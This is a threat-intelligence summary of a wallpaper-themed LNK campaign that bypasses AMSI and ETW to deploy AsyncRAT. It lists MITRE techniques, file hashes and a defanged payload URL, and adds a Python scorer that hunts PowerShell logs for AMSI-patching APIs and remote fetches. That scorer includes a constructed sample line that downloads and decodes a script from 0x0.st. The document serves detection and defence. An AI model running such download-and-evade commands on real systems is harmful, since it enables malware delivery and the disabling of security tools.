Ghost in the Shell: Null-AMSI Evading Traditional Security to Deploy AsyncRAT

A recently identified campaign uses malicious LNK files disguised as wallpapers to trick users into executing malware. The attack relies on obfuscated PowerShell scripts and uses the Null-AMSI technique to bypass AMSI and ETW. The final payload, AsyncRAT, gives attackers remote control of victim systems. Affected: users, systems, security tools

Key points:

  • Campaign uses malicious LNK files disguised as popular animated character wallpapers.
  • Threat actor (TA) likely Portuguese-speaking, as indicated by comments in scripts.
  • Malware employs advanced techniques such as AMSI and ETW bypass using Null-AMSI.
  • Multi-stage execution process with PowerShell scripts fetching additional payloads.
  • AsyncRAT is the final payload, providing remote control and data theft capabilities.
  • Threat actors exploit user interests to increase infection likelihood.
  • Obfuscated and encrypted scripts complicate detection and analysis for security tools.
  • Recommendations include caution against downloading unverified files and monitoring network traffic.

MITRE Techniques:

  • User Execution: Malicious File (T1204.002) – LNK file executed by the user.
  • Command and Scripting Interpreter: PowerShell (T1059.001) – PowerShell scripts used for AMSI/ETW bypass and payload execution.
  • Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001) – output.bat added to the Windows Startup folder.
  • Native API (T1106) – VirtualProtect, GetProcAddress, and GetModuleHandle used for AMSI/ETW patching.
  • Obfuscated Files or Information (T1027) – AES-encrypted and Base64-encoded payloads used.
  • Impair Defenses: Disable or Modify Tools (T1562.001) – AMSI and ETW bypass implemented.
  • Deobfuscate/Decode Files or Information (T1140) – AES and Base64 payloads decrypted/decoded at runtime.
  • Application Layer Protocol: Web Protocols (T1071.001) – Downloads PowerShell scripts and batch files from external sources.
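The technique list above describes a combination (native-API AMSI/ETW patching, Base64/AES decoding at runtime, a fetch from 0x0.st, Startup-folder persistence) that a defender can hunt for in PowerShell Script Block Logging (Event ID 4104). The following Python scorer is an added example, not code from the Cyble write-up or the campaign; its regexes, weights, threshold and sample log text are all assumptions constructed for illustration.

```python
import re
from typing import Dict, List

# Indicator families taken from the techniques listed above. The patterns and
# weights are assumptions for this example, not a vendor detection rule.
INDICATORS: Dict[str, List[str]] = {
    "amsi_etw_patch": [r"VirtualProtect", r"GetProcAddress", r"GetModuleHandle",
                       r"amsi\.dll", r"AmsiScanBuffer", r"EtwEventWrite"],
    "decode_runtime": [r"FromBase64String", r"AesManaged", r"Cryptography\.Aes",
                       r"CreateDecryptor"],
    "remote_fetch": [r"0x0\.st", r"DownloadString", r"Invoke-WebRequest", r"\biwr\b"],
    "startup_persist": [r"output\.bat", r"\\Startup\\"],
}
WEIGHTS = {"amsi_etw_patch": 3, "decode_runtime": 2, "remote_fetch": 2, "startup_persist": 2}
ALERT_THRESHOLD = 5  # no single family alerts on its own; the combination does


def classify_script_block(text: str) -> dict:
    """Score one 4104 ScriptBlockText value against the indicator families."""
    families = {}
    for family, patterns in INDICATORS.items():
        matched = sorted({m.group(0) for p in patterns for m in re.finditer(p, text, re.I)})
        if matched:
            families[family] = matched
    score = sum(WEIGHTS[f] for f in families)
    return {"score": score, "families": families, "alert": score >= ALERT_THRESHOLD}


def triage(events: Dict[str, str]) -> List[str]:
    """Return the ids of events whose script block crosses the alert threshold."""
    return [eid for eid, text in events.items() if classify_script_block(text)["alert"]]


# Constructed sample ScriptBlockText values (not real campaign code). evt-1 only
# strings together the API and download tokens a defender would expect to see logged.
SAMPLES = {
    "evt-1": ("$h=GetModuleHandle('amsi.dll'); VirtualProtect; GetProcAddress; "
              "$p=(New-Object Net.WebClient).DownloadString('hxxps://0x0.st/8KuV.ps1'); "
              "[Convert]::FromBase64String($p)"),
    "evt-2": "Get-ChildItem C:\\Users | Where-Object Name -like 'a*'",
    "evt-3": "$cfg=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($blob))",
}

if __name__ == "__main__":
    for eid in triage(SAMPLES):
        print(eid, classify_script_block(SAMPLES[eid]))
```

evt-3 shows why the threshold matters: a lone FromBase64String call is common in legitimate scripts and scores below the alert line.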

Indicators of Compromise:

  • SHA-256 (sasuke wallpaper.lnk): 5abf73e0b8d2298167801995077fa414d2e2be2051aff75ad13bfd34d3ed6590
  • SHA-256 (wallpaper image.lnk): f76e582e0b43caad6db6665a17341d94c709ca09dd3e36fc3e588e4566d81502
  • SHA-256 (8KuV.ps1.txt): 04fc833b59af93308029d3e87c85e327a1e480508bc78b6a4e46c0cbd65ea8dc
  • SHA-256 (8ZOv.txt): 26e91d3218cbd4f45da9f293f9647a1dfbf9d3d03aad5bd9ce85423d6e75450c
  • URL (2nd-stage payload): hxxps://0x0.st/8KuV.ps1

Full Story: https://cyble.com/blog/null-amsi-evading-security-to-deploy-asyncrat/